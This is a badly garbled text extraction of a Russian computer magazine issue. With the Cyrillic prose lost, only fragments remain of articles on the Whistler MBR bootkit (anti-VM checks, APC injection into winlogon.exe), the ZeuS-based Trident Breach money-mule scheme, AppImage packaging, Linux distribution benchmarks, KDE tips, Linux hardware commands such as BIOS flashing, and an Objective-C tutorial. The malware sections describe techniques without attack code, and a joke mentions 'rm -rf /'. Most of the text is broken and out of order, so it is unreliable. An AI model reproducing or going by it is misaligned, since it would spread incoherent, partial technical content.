Whistler.a. , .
.
.
, ,
.
. PE-,
Microsoft Visual Studio 5.0 ( GUI).
, ,
. .rdata .
Whistler
VMWare RedPill.
.
(Ring 3) in
,
.
, , API VirtualAlloc , . CreateThread
.
WaitForSingleObject.
, , ,
, , .
, .. ,
Process Explorer
FindWindowW("PROCMON_WINDOW_CLASS"),
TrueCrypt
068
TrueCrypt, CreateFileW("\\\\.\\
TrueCrypt", ). .
, ,
.

BIOS .
CR0, EDX, EFlags, IP.
IP FFF0h, BIOS, , ..
CS 0xF000. ,
( , 0xAA55 ),
7C00h.
.
, , .
200h ,
, .
: , ,
? , , , MBR (Master
Boot Record). 512 . MBR
, ,
X 12 /143/ 10
MBR, 0x200
AA55
0x1BE
0x1BE
0x10
#1
0x1CE
0x10
#2
0x1DE
0x10
#3
0x1EE
0x10
#4
0x1FE
0xAA55
1. MBR
2

MBR
0xAA55 . . MBR
(. 1).
MBR,
.
( 2).
0, 0x80. 0x80,
, 0x200
. (
) ( 3). ,
.
Windows
? , ( 7)

. ,
.
. (.
MBR). ,
: MBR ,
0x80, , .
int 13
0x0C
2.
NTFS
0x0B
FAT32
0x17
NTFS
3. .
, (real-address mode).
(protected mode), (Linux, Windows, FreeBSD ..).
, ,
, GDTR, LDTR, CR3 .

BIOS.
-,
. :
mov eax,
[1000:FFFF];
4 0x1000 << 4
= 0x10000;

0x10000 + 0xFFFF = 0x1FFFF;
Whistler
, ,
. , MBR ,
\\.\PhysicalDriveX CreateFile.
,
. MBR, Whistler,
,
PE. , . . exe,
. , X 12 /143/ 10
069
MALWARE

Whistler
RedPill Trojan-Clicker.
Win32.Whistler.a
MBR Bochs Enhanced Debugger

for Windows
, . MBR.
Bochs
for Windows .
. .
MBR
BIOS. ,
, BIOS ,
.
, c , , .
-
int 13h, MBR
. int 13h
NTLDR . : 0xB8
REPNE SCASB,
CMP. , NTLDR , BlLoadBootDrivers
. .

. , IoInitSystem.
,
IoInitSystem, . Whistler ,
, .
070
Trojan-Clicker.Win32.Whistler.a
.
,
.
MBR , .
Stoned Bootkit FrameWork, European Union Public License.
, , .
\\.\physicaldrive0,
PE
APC. APC Asynchronous Procedure Call ,
.
Windows , APC , , ,
.
winlogon.exe, KeStackAttachProcess
. KeInitializeApc
APC-,
KeInsertQueueApc,
. , : \\??\C:\
System Volume Information\Microsoft\.
Whistler,
, ,
. , , .
, Microsoft Visual Studio.
.
, ,
banner3.php .
. , ,
Windows,
, Windows 7, . Windows XP . ,
Bochs
VMWare PETools , , Hiew
. IDA Hex-Rays
PE'. ,
, , Hiew
\\.\physicaldriveX. z
X 12 /143/ 10

Mifrill (mifrill@real.xakep.ru)
, ,
,
. , ,
.
,
.
Trident Breach
-

Trident Breach (:
), ,
,
ZeuS-.
ZeuS
;
.
, ZeuS, Zbot, PRG, Wsnpoem, Gorhax
Kneber
.

, ,

IT-
.
.

, ,
.
.
,
, ,
2009 .
46
, ,

ZeuS-.
,
. -
072
074
,
( ,
), ,

, .
,
- ,

.
. ,
,
, .

,
, , ,
.

:
e-mail- (
ZeuS).

,
, , , .
, ,

. ,

$220 ., , ( ) $70
. , :
,

.
, ?
. ,

,
( money
mule ) ,

( ) ,
.
,
Trident Breach, 20 25 ,
, ,
.
( )
,
-. ,
.
, . ,
, ... ,
, , ,
J-1,
Work&Travel. , :
W&T -
, ,
.
, .

,

.
? ,
.
, ,
X 12 /143/ 10

. ,
,

.

;
$3000.
,
- .
1. ,
2.
3. -
4. -
5.
6.
8.
7.

-
,

: 390
: $220
: $70
: 92 39
: 20 8
: 5 8
X 12 /143/ 10
073
? ,
ZeuS
(
,
). ,
5-20% .
. , ,
,
.
:
,
PIN-.

.
.

. Trident Breach

.
( )
,
Jack Daniels. Jack Daniels,
26- ,
:
,
.

, ,
.

-,
074
. , Jack Daniels
,

$9983.
Jack Daniels
,
.
.

, Jack Daniels

. , ,
: 10
$38 314 . ,
20
$500 000. , ,
,
:).
,

. ,
.
39 ,
92 !
-,
,

. , ,

,
TD Bank,
Chase Bank, Bank of America Wachovia,
,

. , :
, , -,
.

-

, ,

.
: 10 30 $250 000 $1
. . , ,
,
.
, , , 20
(
)
.

, . , ,
, ,
, . , ,
ZBot
(,
, ).

, ,
,

ZeuS,
.
, , .
,
, ,
. , , Trident Breach ,

, ,
.
,
, $70 .
,
,
. z
X 12 /143/ 10
OPHCRACK 3.3.0
( MB)
WIRESHARK 1.2.2
( MB)
GPODDER 2.5 UNIXOID

zobni n@gmail.com
( MB)
WEBILDER 0.6.9
( MB)
FFMPEG
( MB)
EMESENE 1.6.3
( MB)
TRANSMISSION 2.03
( MB)
VLC 1.2.0-GIT
( MB)
TRANSMISSION 1.92
( MB)
VLC 1.1.1
( MB)
ZENMAP 5.00
( MB)
UPDATER 0.1
( MB)
XARA EXTREME 0.7

( MB)
TUCAN MANAGER 0.3.8

( MB)
VIEWNIOR 1.0
( MB)
AMULE 2.2.6
( MB)
XNOISE 0.1.10
( MB)
UPDATER 0.0.4
( MB)
TORRENT SEARCH 0.8.1

( MB)
TERMINATOR 0.93
( MB)
UPDATER 0.1.1
( MB)
TERMINAL 0.4.3
( MB)
UPDATER 0.0.9
( MB)
TEAMVIEWER 5
( MB)
XCHAT 2.8.6
( MB)
UPDATER 0.0.6
( MB)
XBMC MEDIA CENTER SVN32789

( MB)
UPDATER 0.0.5
( MB)
SPOTIFY 0.4.8.213
( MB)
SPOTIFY 0.4.6.75
( MB)
Elementary Project
Linux-
AppImage,

. , ,
Linux,
.
Elementary Project (
, ,
Ubuntu, www.elementary-project.com)
, Windows
(Portable Apps),
: (,
, ),
(
)
(
). :
.
( )
.
076
, Dropbox,
,
.
.
, .
?
.
AppImage- Portable Linux Apps

(www.portablelinuxapps.org),
.

(Kubuntu
10.04 x64). Opera 10.70

15 ,
( ,
AppImage-

.appimage, ).
file
ELF 32-bit LSB executable, Intel 80386
.
(chmod +x Opera\ 10.70), , libfuse.so.2 .

.
, , .
ldd, -,

libc libfuse libglib-2.0.
fuse,
X 12 /143/ 10
SPOTIFY 0.4.3
( MB)
SKYPE 2.1.0.81
( MB)
SPIDEROAK
( MB)
SIGIL 0.2.4
( MB)
SHOTWEL
PHOTO
VIEWER
0.6.1
( MB)
SHOTWEL
PHOTO
MANAGER
0.5.0
( MB)
AppImage
. ,

.
.opera,
,
( ,

Dropbox).
, AppImage ,
(64- ),
.
.
AppImageAssistant
AppImage

( , ),
? ,
GTK ( Gnome),
, mc. ,
.
Kubuntu libglib-2.0 ,
libfuse. sudo apt-get install libfuse2 libfuse2. ,
(, NTFS-3g,
Ubuntu), ?
: 64- libfuse
32- ,
Opera 10.70. : 32-
.
, 32- Ubuntu 10.04 .
Opera 10.70, ,
X 12 /143/ 10
, , Deb RPM. AppImage

,
, ISO-, ,
.
AppImage
ISO-. ,
mount
. ( , )
( ),
( fuse)
AppRun,
. AppImage- ,
.
ISO-,
, :
$ mkdir /tmp/appimage
$ sudo mount -o loop Opera\ 10.70 /tmp/appimage
$ cd /tmp/appimage && ls
077
OPHCRACK 3.3.0
( MB)
GPODDER 2.5 UNIXOID
( MB)
XBMC MEDIA CENTER SVN32789

( MB)
WIRESHARK 1.2.2
( MB)
FFMPEG
( MB)
VLC 1.1.1
( MB)
UPDATER 0
( MB)
AppImage RISC OS
EMESENE
1.6.3
( MB)
AMULE
2.2.6
( MB)
ZENMAP
5.00
( MB)
XNOISE
0.1.10
( MB)
VLC 1.2.0-GIT
( MB)
mount , AppImage

WEBILDER
? -, AppRun,
0.6.9
ISO-.
XARA EXTREME
0.7
( MB)
.
( MB)
XCHAT 2.8.6
( MB)
APPRUN
HERE=$(dirname $(readlink -f "${0}"))
export OPERA_DIR="${HERE}"/share/opera
exec "${HERE}"/lib/opera/opera "$@"
VIEWNIOR 1.0
( MB)
OPERA_DIR
/_/share/opera
/_/lib/opera. , OPERA_DIR
, /usr/share/opera. ,
AppRun
, (,
), .
AppImage opera-browser.desktop, , , (
opera-browser.png), , ,
, ..
( freedesktop). .DirIcon.
.
LICENSE, install, opera-widget-manager
share lib,
/usr/share /usr/lib.
, , man-, . Opera ( ,
Xlib X Window),
lib ,
Gstreamer. ,
, ,
.
AppImage
AppImage- ,
.
:
(, ,
-)
AppRun
.desktop,
: , AppRun .desktop- (
078
1988 Acorn Computers RISC OS 2.00,

. ,
AppDir:
, . ,
!Run, .
NEXTSTEP, ,
ROX-Filer (
RISC OS on X).
ROX ,
!Run AppRun, !Sprites .DirIcon,

.appdir. AppImage
.desktop-.
)
( MB) deb-
. , - ,
TRA . ,
Elementary Project (www.
elementary-project.com/wiki/index.php?title=Creating_AppImages).

:
$ ar xv .deb
: control.tar.gz, data.tar.gz debian-binary.

, .
. :
$ tar xzf data.tar.gz
,
.appdir:
$ mv data .appdir
_.desktop .appdir/
usr/share/applications .appdir.
AppRun, Elementary Project:
$ cd .appdir
$ wget www.elementary-project.com/downloads/AppRun
$ chmod +x AppRun
AppRun, . , ,
AppDir (Application Directory) ,
. ISO .
AppImageAssistant (www.elementaryproject.com/downloads/apps/AppImageAssistant).
, Forward, .
appdir Forward. , AppImage .
(,
Elementary Project). .
, .desktop-, AppDir, .
X 12 /143/ 10
UPDATER 0
( MB)
UPDATER 0
( MB)
UPDATER 0
( MB)
UPDATER 0
( MB)
UPDATER 0
( MB)
TUCAN
MANAGER
TRANSMISSION 1.92
( MB)
0.93
( MB)
TERMINAL 0.4.3
( MB)
TORRENT SEARCH 0.8.1

( MB)
ER 0.1
ER 0.1.1
ER 0.0.9
ER 0.0.6
ER 0.0.5
Opera,
ER 0.0.4
N
GER 0.3.8

Ryan C. Gordon FatELF,
. ,
ARM x86.
FatELF
- ,
.
,
,
, ,
. AppRun,
Elementary Project,
. ,
.desktop-
,
AppDir (, .appdir/usr/lib .
appdir/usr/bin) . ,
- /usr/share,
AppImage ,
. ,
Opera
OPERA_DIR,
.
, -
, .
DOS, - ,
Portable. ,
NEXTSTEP Mac OS X.
.app ( ,
), .

RISC OS,
ROX ( AppImage RISC OS).
UNIX-
. UNIX
. , ,
X 12 /143/ 10
portablelinuxapps.org portable-
. UNIX
TEAMVIEWER
5
.
( MB)
TERMINATOR
/bin,
/lib. ,
.
UNIX , ,
- ( make install ). , ,
,
,
, 40 ,
, , .
, , ,
,
.
dll hell (
, , , ), /usr (
?),
( apt-get install firefox3 firefox4
) (
). . ,
UNIX ,

, .
Linux
. Zero Install
(zero-install.sourceforge.net),
.
Klick (klik.atekon.de)
. AppImage.
AppImage- ,
, . ,
Linux,
, Linux
Linux' . z
079
UNIXOID
grinder grinder@tux.in.ua
: Linux Mint 9
vs Calculate Linux Desktop 10.9
Gentoo
, .
gcc
,
. ,
.
Linux?
,
?
,
,
. 21
source-based -
080
Gentoo Crux. -
,
CPU Celeron 300A.
, FreeBSD,
, ,
Linux.

,

Debian Ubuntu. ,

,
, .

. , , . Gentoo,
, ,
Stage
X 12 /143/ 10
HTTP://WWW
links
Phoronix Test
Suite phoronix-testsuite.com
GCC gcc.gnu.
org/onlinedocs
, :
en.gentoo wiki.com/
wiki/Safe_Cflags/Intel,
en.gentoo-wiki.com/
wiki/Safe_Cflags/AMD
CLD
calculate-linux.ru/
main/ru/optimization_
of_system
QGears2
1 Stage 2, , ,
, . 3-5%,
Stage 1 2, Stage 3, .
C , : x86 x64 (
). ,
, .
, x86 , .
, .
, , , : Linux
Mint 9 source-based Calculate Linux Desktop 10.9 beta (CLD).
Ubuntu ,
.
Gentoo, , ,
( CLD Gentoo).
,
PR.
Linux Mint , i386 amd64. CLD 10.9 beta
i686 , .
Linux Mint 9 Isadora
: linuxmint.com
: 18 2010
: GNU GPL
X 12 /143/ 10
: x86_32, x86_64
: kernel 2.6.32, glibc 2.11.1, GCC
4.4.3, UDEV 151, HAL 0.5.14, X.Org 1.7.6, Compiz 0.8.4,
GNOME 2.30.0, Mesa 7.7.1
Calculate Linux Desktop 10.9 beta
: calculate-linux.ru
: 26 2010
: GNU GPL
: x86_32, x86_64 ( )
: kernel 2.6.34.4, glibc 2.11.2, GCC
4.4.3, UDEV 151, HAL 0.5.14, X.Org 1.7.7, Compiz 0.8.4,
GNOME 2.30.0, Mesa 7.8.2
,
. X.Org. : AMD
Athlon 64 X2 Dual-Core 3600+/2 /Seagate Barracuda ST3160815A/
ATI Radeon X800 GTO.
Phoronix Test
Suite 2.8 Lyngen (phoronix-test-suite.com), 130
. Debian/Ubuntu deb-.
Gentoo ebuild, ,
CLD Generic Pckage.
php cli,
emerge. ,
phoronix-test-suite list-tests,
phoronix-test-suite info <test name> ( Test Type
) , , phoronix-test-suite benchmark <test
name>.

, .
~/.phoronix-test-suite. ,
081
UNIXOID
Ubuntu/Debian
Gentoo ,
, .
, , , Gentoo.
, /etc/apt/sources.list
, deb-src. Linux Mint . apt-get update apt-build:
$ sudo apt-get install apt-build
Phoronix Test Suite GUI

,
, 1,5 , .
phoronix-test-suite make-download-cache.
download-cache.
test-result.
.
, . , 133 ( ,
), 10 (
VERIFIED, FREE). , : build-mplayer, john-the-ripper (Traditional DES), compress-gzip
( 2 ) encode-flac, encode-ogg, mencoder (
AVI to LAVC), openssl. ,
warsow ( 800x600),
FPS (warsow.net), OpenGL-
qgears2. , qgears2 CLD,
:
# emerge qt-opengl

phpbench, PHP-. Phoronix Test
Suite 3-5 . , ,
.
32 vs 64
Linux
: 32- 64- .
,
. 32-

i386, i486, i586 i686, , . ,
P6 (i686, Pentium Pro) 1995
, . ,
i386-i586, , (
,
][ 04.2007 ..) ,
( MMX, SSE, 3DNow ..),
.
32 Linux Mint 9 ( Ubuntu) i386 , - . ,
082

.
dpkg-reconfigure apt-build.
apt-get aptitude apt-build, . ,
, apt-build update, apt-build install
_. , aptbuild upgrade, apt-build world .
--force-yes .
/usr/
share/doc/apt-build/README.Debian,
. ,
:
$ sudo dpkg --get-selections | awk '{if ($2 ==
"install") print $1}'> /etc/apt/apt-build.list
Ubuntu 32 Recommended for most

users, 64- : Not recommended for daily desktop
usage. ,
64-. :
Linux Mint 9 (32bit)
warsow - 2.57 FPS
build-mplayer - 260.97 sec
john-the-ripper - 950160333 Real C/S
compress-gzip - 54.61 sec
encode-flac - 25.70 sec
encode-ogg - 36.87 sec
mencoder (AVI to LAVC) - 54.27
openssl - 11.90 Signs PS
phpbench - 19573.00 Score
QGears2:
CPU-based Raster - Test: Gears - 24.49 FPS
XRender Extension - Test: Gears - 42.32 FPS
OpenGL - Test: Gears - 67.68 FPS
Linux Mint 9 (64bit)
warsow - 2.60 FPS
build-mplayer - 194 sec
mencoder (AVI to LAVC) - 53.24 sec
openssl - 37.75 Signs PS
phpbench - 28621 Score
QGears2:
X 12 /143/ 10
John the Ripper 32- , 2%
PHPBench 64- Linux

Mint
64-
32- .
2-8%.
PHPBench 46%. ,
64- 32 John
the Ripper. , JTR , 64 . , CLD, i686-
.
CLD
Calculate Linux Desktop 10.9 beta ( )

warsow - 2.60 FPS
openssl - 11.8 SPS
QGears2:
. ,
MPlayer 32- CLD 64- Linux
Mint 3 . WAV- FLAC CLD
64- Linux Mint, OGG
64- .

.
OpenSSL, , 32- 64-. PHPBench 32-
CLD 64- 25%,
32- Linux Mint.
FPS Warsow , , , Mesa. OpenGL QGears2 CLD
, , Mesa.
, ,
Gentoo ,
. , ,
64- CLD ,
Linux Mint x64. ,
.
X 12 /143/ 10
, source-based
,

.
( -march -mtune ;
native,
/proc/cpuinfo), , , ,
.
, ,
, , /,
. , -
,
, . GCC : -O0
( ) -O3 ( ) -Qs
( ).
, ,
. -O2, -O3 .
, ,
(, -fomit-frame-pointer, -ffastmath, -funroll-loops). ,
CFLAGS, :
$ gcc -Q --help=optimizers | grep enabled
man
gcc GCC (gcc.gnu.org/onlinedocs/).
Gentoo , Portage,
/etc/make.conf. .
CHOST , CFLAGS
. MAKEOPTS , ,
(
). LINGUAS. CLD make.conf
, ( calculate-linux.ru/
main/ru/optimization_of_system).
:
# cat /etc/make.conf
/usr/share/calculate/templates/install/merge/
083
UNIXOID

OGG 64-
Linux Mint
portage/make.conf
LINGUAS="en ru"
ACCEPT_LICENSE="*"
source /var/lib/layman/make.conf
CFLAGS="-march=native -O2 -pipe -fomit-frame-pointer"
CXXFLAGS="${CFLAGS}"
MAKEOPTS="-j3"
EMERGE_DEFAULT_OPTS="--jobs=4"
:
# emerge -e system
# emerge -e world
mencoder, QGears2), - (encodeflac, phpbench). , , ,

. ,
, .
,
, .
64- .
. ,
.z
.
Calculate Linux Desktop 10.9 beta ( )
warsow - 2.60 FPS
openssl - 11.8 SPS
QGears2:
, . -
(build-mplayer, john-the-ripper, compress-gzip, encode-ogg,
084
QGears2 CLD 64- Linux Mint

X 12 /143/ 10
UNIXOID
Adept adeptg@gmail.com

DE
KDE 4.0 ,

KDE 3.5.
, ,
Qt KDE4
DE .
KDE, .
Plasma widgets
KDE4
KDE3 Plasma,
, KDesktop, Kicker
SuperKaramba. .

.
SuperKaramba, Google
Gadgets, Mac OS X Dashboard,
. ,
:
086
folder view (
) ,
.
; , , /tmp.

Flash (*.flv).
, YouTube :).
pastebin ,

( pastebin.
ca pastebin.com)
( imagebin.ca, imageshack.us, simplestimage-hosting.net imgur.com). ,
Dolphin , ,
KSnapshot
Pastebin. ,
.
paste ( )
,
.
X 12 /143/ 10
INFO
info
<Alt+Tab>
kubuntu
: sudo aptget install plasmawidget-*.
krunner

.
tail ( ) ,
.
.
.
google translator ,
translate.
google.com.
plasmacon (konsole)
. .
easy SSH connection
SSH-.
web slice ( Web) ,
- .
RSS ( ,
).
microblogging .
lancelot kickoff. krunner
. .
,
.
, , Amarok ( ).
,
zeroconf (, avahidaemon). : Share
( ) Share this widget on the network
( ).
, ,
,
. , dolphin network:/.
,

. , - .
.
Plasma activites
, , Plasma
Activites. , ,
,
. ? X 12 /143/ 10
Live-
KDE
:
http://home.kde.
org/~kdelive/
.
, .
vim/emacs/eclipse ( ) . .

, , IM-
(
),
.. , , .
. . .
, -
.
, ,
:). .
. , ?
KDE . -
, - 4.8. :
/ , (
Super-Q).
,
( gnome_killer- :) ).
: System Settings (
) Window Behavior ( )
Virtual Desktops ( ) Different widgets
for each desktop ( ).
,

. ;
- : .
Plasma netbook
Plasma ,

/.
. : System Settings (
) Workspace ( Plasma)
Workspace type ( )
Netbook ().

Search and Launch.
( -
Zeroconf (Zero Configuration Networking) ,

IP-.
Avahi
zeroconf.
HTTP://WWW
links
kde.org

planetkde.org

KDE
userbase.kde.
org KDE
(wiki)
www.kdedevelopers.org
KDE
windows.kde.
org KDE
Windows
WARNING
warning
KDE
4.5,

.
087
UNIXOID
klipper
krunner) .
, .
, taskbar'
( ) ( )
.

, /
, , ,
. . <Alt+Tab>, taskbar'.
Search and Launch,

, (
page one). page one ,
. , Plasma
, Add page ( ).
Plasma Netbook ,
.
kwin
KDE.
, compiz, () Intel',
, WM.
-, kwin . ,

. System
Settings ( ) Desktop Effects ( ).
kwin
, ,
.
.
Move Window to Group (
). -
, konsole dolphin.
kwin
. , ,
rekonq
. :
Advanced ()
Special Application Settings ( ).
edge snapping. : () , ().
, .
KDE 4.5, kwim (tailing)
. , ,
088
KDE4 , (,
) Windows Mac OS X.
, KDE WinXP,
. , .
KDE SC
4.5.1, Win 4.4.4. WinXP .
windows.kde.org ( ;
).
: ---.
:
, . winkde.org , nightly.
, .
, KDE Win .
.
. :
xmonad, ion3, ratpoison , .
, , . , : System Settings ( ) Window Behavior ( ) Advanced
() Enable tiling ( ).
:
(Spiral) ( )
.

.
(Columns) : ,
.
(Floating) ,
.
Spiral. ,
( )
. :
Float
Window ( ).

.
, /.
, WM,
(: ). ,
,
. , .
krunner
,
krunner. ,
<Alt+F2>. , , krunner (
Nepomuk). ,
<Tab>/<Tab+Shift>
/. , .
Krunner ,
, , 16*1024=.
X 12 /143/ 10
Plasma Netbook
Tailing
KDE

. (sin, cos ..), (sqrt) . , krunner
, ,
, rm -rf / :). krunner , , 21,5 , . , , , , ,
. xakep.ru,
. , :
ggk: some_word some_word
wp: some_word some_word
krunner Konqueror' rekonq (

).
: krunner (,
) , kopete amarok
, . ,
.
Klipper
KDE .
klipper, .
, .
. ,
clck.ru,
(^(http|https|ftp):\/\/[a-z0-9]+([\-\.]
{1}[a-z0-9]+)*\.[a-z]{2,5}(([0-9]{1,5})?\/.*)?$),
lwp-request http://clck.ru/--?url=%s.
.
Shortcuts ( ) ,
Manually Invoke Action on Current Clipboard (
X 12 /143/ 10
) ( <CtrlAlt-R>). ,
, .
KDE . .
, ,
. Dolphin timeline,
. ,
Strigi : Desktop Search ( ) Enable Strigi Desktop File Indexer
( Strigi). File Indexing
( ) ,
, . Strigi
( ODT, PDF, MP3) , ,
,
,
.
Dolphin (Settings ()
Toolbar Shown ( ) Search Toolbar
( )) Nepomuk.
nepomuksearch:/KDE.
.
KDE4 DE .
Gnome

Gnome3. ,
KDE, . ,
. z
089
UNIXOID
zobni n@gmail.com
Linux
- ,
200 , HAL udev
.
UNIX ,
.
Linux
, ,
,
.
, UNIX-
,
Windows
. ,
,

. Linux
. , ,

? ,
,
.
090
7.3 X.Org ,

.
, .

. ,
,
( ,
).
(
,
- ).

,
,
<Fn>, , X 12 /143/ 10
ddccontrol

INFO
info

lshw.
nvramwakeup

BIOS.
flashrom , BIOS
. ,
UNIX . -
, ,
.
, (
) ,
Synaptics. X.Org , ,
. synclient
, syndaemon -
. , Linux-
,
(,
ASUS /etc/acpi/events/asus-touchpad, /etc/apci/asus-touchpad.sh).
, .
, (

, ,
).
, synaptics
, xorg.conf.
. X- (
1.8) , ,
/usr/lib/X11/xorg.conf.d.
( ,
, , xorg.conf
-). 10-synaptics.conf
InputClass,
,
Option "SHMConfig" "true" (
), . :
#
X 12 /143/ 10
BIOS

modprobe nvram
&& dd if=/dev/nvram
of=nvram.bin.
Option "VertTwoFingerScroll" "1"

Option "HorizTwoFingerScroll" "1"
#
Option "AccelFactor" "0.010"
#
Option "CircularScrolling" "on"
Option "CircScrollTrigger" "0"
,
. -, synaptics ,

, ,

- .
(
).
-, KDE/Gnome, gsynaptics
synclient ( X.Org , , ,
). X.Org,
. ASUS (
) . :
$ synclient TouchpadOff=1
. . ,
( ~/.xinitrc DE):
$ syndaemon -K -d -i 1
'-K' syndaemon
,
091
UNIXOID

xrandr
Intel
* LVDS:
* TMDS-1: DVI
* VGA: VGA
* TV: TV-
ATI
* LVDS:
* DVI-0: DVI
* DVI-1: DVI
* VGA-0: VGA
* VGA-1: VGA
Nvidia ( )
* LVDS:
* DVI0: DVI
* DVI1: DVI
* VGA0: VGA
* VGA1: VGA
xrandr KDE
, '-d' ,
'-i' . '-t',
, .
, , , , :
ACTION=="add", SUBSYSTEM=="input", ID_CLASS="mouse",
RUN+="/usr/bin/synclient TouchpadOff=1"
ACTION=="remove", SUBSYSTEM=="input", ID_CLASS="mouse",
RUN+="/usr/bin/synclient TouchpadOff=0"
/etc/udev/rules.d/01touchpad.rules. .

- .
( ) . ,
, , VGA- HDMI. ,
, , ,
.
,
(,
KDE ).
KDE,
.

X-.
: Xinerama, DEC ( PanoramiX),
RandR, ,
Xinerama.
,

X.Org ( , ,
Xinerama
,
).
Xinerama, RandR
( !),
OpenGL AIGLX ( Compiz'
FlightGear!) . ,
dual head xrandr
( ):
092
1. xrandr -q (
xrandr ). VGA- VGA-1 , VGA-0
, disconnected, .
2. , xrandr -q
connected VGA-0.
DDC ( ),
.
3. :
$ xrandr --output VGA-0 --auto
$ xrandr --output VGA-0 --mode 1024x768 --auto
.

(
).
( , ),
.
, , .
4. :
$ xrandr --output VGA-0 --right-of LVDS
,
( 1024x768 2048x768).
,
(LVDS ) .
'--right-of', ,
. xrandr '--left-of' (), '--above' () '--below' ().
, , '--pos'. :
$ xrandr --output VGA-0 --pos 1024x0
X 12 /143/ 10
xrandr -q

SATA-
2.6, Linux
SCSI-, SATA. ,
,
. ,
,
( sda
: sda1 sda2)
#
#
#
#
sync; sync
umount /dev/sda1
umount /dev/sda2
echo 1 >/sys/block/sda/device/delete
SATA-
:
# echo "- - -" >/sys/class/scsi_host/host{0..3}/scan
, ,
. ,
nVidia . nVidia (Intel, nVidia, AMD/
ATi), RandR
1.2, ,
.
TwinView,
nvidia-settings ( ,
, ).
DDC (Display Data Channel)

,
, .

, , .
DDC
,
.
, ,
X 12 /143/ 10
. , ,
,

, ,

.
DDC , I2C (InterIntegrated Circuit).
VGA-, .
DDC
,
(
, ), , ,
, ,
256 ( ,
). DDC
, ,
( ).
, DDC
. ,
. -, ddccontrol,
, ,
. -, ddccontrol,
, ( ),
. -,
( 256 ) ,
.
, . ddccontrol:
$ sudo apt-get install ddccontrol
'-p', :
$ sudo ddccontrol -p
, . ,
I2C :
$ sudo modprobe i2c-dev
$ sudo su
# echo i2c-dev >> /etc/modules
. ! . ,
,
, . ddccontrol -
093
UNIXOID
lshw
,
VESA.
, (
0x10 0x12, 50 127).
:
$ sudo ddccontrol dev:/dev/i2c-1 -r 0x10

Linux, -, Linux

flashrom.
flashrom
OpenBIOS,
. flashrom

,
BIOS, .
, http://flashrom.org,
Linux-
BSD-.
,
. flashrom ,
, 100%
EEPROM,
BIOS ( ).
,
'--force'
.
, EEPROM:
$ sudo ddccontrol dev:/dev/i2c-1 -r 0x10 -w 50

$ sudo flashrom
dev:/dev/i2c-1 I2C- ddccontrol -p, 0x10 , 50 .

, ,
cron (,
).
VESA. , 0xe1
:
$ sudo ddccontrol dev:/dev/i2c-1 -r 0xe1 -w 0
$ sudo ddccontrol dev:/dev/i2c-1 -r 0xe1 -w 1
(
, BIOS
), No
EEPROM/flash device found, ,
.

( ,
):
$ sudo flashrom -r old_bios.bin
:
alias :
$ sudo flashrom -w new_bios.bin
$ sudo su
# echo "alias haltmon='ddccontrol dev:/dev/i2c-1 \
-r 0xe1 -w 0'" > ~/.bashrc
, :
$ sudo su
# mplayer .avi; haltmon
Samsung'
,
.
(, Game ).
ddccontrol
( 0xdc
).
BIOS
, BIOS
, DOS. , . ,
094

( ):
$ sudo flashrom -v new_bios.bin
EEPROM- ,
'-c',
( ).
. BIOS Linux , . , ,
SSH- (
Puppet, ).
UNIX- .
, , LFS .
, , ,
. z
X 12 /143/ 10
CODING
seva@vingrad.ru
- !
Mac OS
Objective-C
,
C/C++ Java, Objective-C
.
API Cocoa. Objective-C Cocoa .
C ...
C
Objective-C , 1986 , Brad Cox Tom Love Stepstone.

, - , .
C,
Smalltalk, .
-
Objective-C C. ,

Apple, ...
Apple 1980 .

Coca-Cola (John
Sculley). Apple
, NeXT. NeXT
.

bjective-C API. NeXT
096
NeXTStep. ,
ObjC. NeXT
Sun Microsystems NeXTStep
OPENStep (
GNUStep, ). 1990-
Apple, .

Mac OS.
Apple ,
. , ,
NeXT. Apple, NeXTStep
Mac OS X, Objective-C Mac- API Mac OS X.
, Objective-C -
. , , , ?
Objective-C :
Objective-C . ,
- .
X 12 /143/ 10
>> coding
XCode 4 - Interface Builder
Cocoa
,
. ,

Objective-C ( ++, -, ).
Objective-C message-oriented language,
, C++ Java,
. -
, ,
,
,
, ,
. , ,
.

, . Objective-C
; ,

, ( ) instance-, ,

( ,
,
C++ Java) ..
, !
- : .
!.
,
! HelloWorld Obj-C. ,
Mac OS X ,
Objective-C Cocoa c
GCC OpenStep.
X 12 /143/ 10
ObjC
#import <Cocoa/Cocoa.h>
void main()
{
NSLog(@"Hello world!");
}
HTTP://WWW
links
HelloWorld C++, ?
, , ,
.
#import ,
#include, , ,
,
, C++ (#include, , ).
Cocoa.h , ,
Cocoa, .
NSLog . stdout timestamp
. NeXTStep? NS
:).
Objective-C . NSLog C-, NSString.
NSLog?
ObjC NSString
ocoa zerro-terminated ,
C, NSString
(NSMutableString ). Cocoa , NSString
,
. , , ,
.
XCode .
XCode , Mac OS iOS.
, , ,
.
Interface Builder,
SCM .
Apple
GCC. GDB.
developer.apple.com
,
Mac OS
www.cimgf.com
Cocoa
Objective-C
www.gnustep.org
GNUStep
www.cocotron.org
ObjC, XCode
Cocoa Windows
DVD
dvd

XCode

097
CODING
XML-
// Cocoa
#import <Cocoa/Cocoa.h>
names = [valute elementsForName: @"CharCode"];

NSArray * values = nil;
values = [valute elementsForName: @"Value"];
// , ?
if ([names count] > 0 && [values count] > 0)
{
// CharCode - Value
// NSMutableDictionary
[Valutes setObject:
[(NSXMLElement *)
[values objectAtIndex: 0] stringValue]
forKey:[(NSXMLElement *)
[names objectAtIndex: 0] stringValue]];
}
// ,
//
return self;
//
@interface RCBDayly : NSObject
{
@private
// NSMutableDictionary map C++
NSMutableDictionary * Valutes;
}
// URL -
-(RCBDayly *) initWithContentsOfURL:(NSURL*)url;
//
// getValueForCharCode.
-(NSString *) getValueForCharCode:
(NSString *) char_code;
@end
}
//
@implementation RCBDayly
-(RCBDayly*) initWithContentsOfURL:(NSURL*) url
{
// NSObject
[super init];
// xml, URL
NSError * err = nil;
NSXMLDocument * cbr_xml =
[[NSXMLDocument alloc] initWithContentsOfURL:url
options:0 error:&err];
if (err != nil && [err code] != 0)
{
// . , ,
// XML- .
// , ,
// locolizedDescription NSError
NSLog(@"Error:%@", [err localizedDescription]);
// ,
[self release];
return nil;
}
// NSMutableDictionary
Valutes = [[NSMutableDictionary alloc] init];
//
// private- Valutes
-(NSString*) getValueForCharCode:
(NSString*) char_code
{
return [Valutes objectForKey: char_code];
}
@end
int main(int argc, char *argv[])
{
// ,
// , , [NSURL
URLWithString]
NSAutoreleasePool * pool =
[[NSAutoreleasePool alloc] init];
// RCPDayly
// URL
RCBDayly * dayly_values =
[[RCBDayly alloc] initWithContentsOfURL:
[NSURL URLWithString:
@"http://www.cbr.ru/scripts/XML_daily.asp"]];
// XML-
NSArray * nodes = nil;
// Valute XML
nodes = [[cbr_xml rootElement]
